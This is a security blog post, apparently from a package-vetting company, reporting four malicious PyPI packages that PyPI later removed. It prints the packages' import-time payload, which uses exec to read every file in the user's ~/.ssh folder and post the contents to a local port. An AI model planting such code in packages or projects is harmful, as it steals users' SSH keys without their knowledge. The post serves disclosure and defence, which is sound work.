Four malicious Python packages read your SSH keys

Reported Jan 04, 2022 by Ashish Bijlani

mlp2
leaks SSH keys malicious

This is an example package to demonstrate a malicious code inside

25 Apr, 2021
PyPi Versions 4
mlp2
mlp2@gmail.com
Deps 2

Our static analysis module flagged the following four packages: mlp2, mlp1, mlp3, and mlp4. We decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform to vet PyPI Python packages for software supply chain attacks. Our free CLI and CI/CD tools can help developers adopt pre-vetted third-party open-source packages and ship faster.

Our technology-generated report shows the use of exec API in init.py. Fig 1 shows an excerpt from init.py file.

    data = b"
            import os
            import requests
            ssh_dir = os.path.join(os.path.expanduser('~'), '.ssh')
            files = os.listdir(ssh_dir)
            all_keys = ''
            for file in files:
                file_path = os.path.join(ssh_dir, file)
                    try:
                        with open(file_path) as f:
                            content = f.read()
                            all_keys += file_path + '\\n'
                            all_keys += content
                            all_keys += '~' * 80 + '\\n'
                    except:
                        pass
                    try:
                        requests.post('https://127.0.0.1:4141', data=all_keys)
                    except:
                        pass
            "
    exec(data.decode())

Fig 1. init.py reads SSH keys

As the code in init.py is executed implicitly when the package is imported, it looks an attacker can use this package as a dependency to mount an attack. As seen from Fig 1, the code read files in user's SSH dir and send the data to localhost at port 4141.

We reported our findings to PyPI maintainers, and they have yanked this package as of Jan, 2022.